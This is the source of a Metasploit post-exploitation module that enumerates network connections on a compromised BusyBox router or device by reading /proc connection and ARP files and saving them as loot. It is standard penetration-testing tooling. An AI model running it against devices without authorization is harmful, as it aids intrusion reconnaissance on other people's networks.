Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::BusyBox
9

10
  FILES = [
11
    '/proc/net/nf_conntrack',
12
    '/proc/net/ip_conntrack',
13
    '/proc/net/tcp',
14
    '/proc/net/udp',
15
    '/proc/net/arp',
16
    '/proc/fcache/*'
17
  ]
18

19
  def initialize
20
    super(
21
      'Name' => 'BusyBox Enumerate Connections',
22
      'Description' => %q{
23
        This module will be applied on a session connected to a BusyBox shell. It will
24
        enumerate the connections established with the router or device executing BusyBox.
25
      },
26
      'Author' => 'Javier Vicente Vallejo',
27
      'License' => MSF_LICENSE,
28
      'Platform' => ['linux'],
29
      'SessionTypes' => ['shell']
30
    )
31
  end
32

33
  def run
34
    found = false
35
    print_status('Searching for files that store information about network connections')
36
    FILES.each do |f|
37
      next unless busy_box_file_exist?(f)
38

39
      found = true
40
      print_good("Connections file found: #{f}.")
41
      read_connection_file(f)
42
    end
43

44
    print_error('Any file with connections found') unless found
45
  end
46

47
  def read_connection_file(file)
48
    str_file = read_file(file)
49
    vprint_line(str_file)
50
    p = store_loot('busybox.enum.connections', 'text/plain', session, str_file, file, 'BusyBox Device Network Established Connections')
51
    print_good("Connections saved to #{p}")
52
  rescue EOFError
53
    print_error("Nothing read from file #{file}, file may be empty")
54
  end
55
end
56

57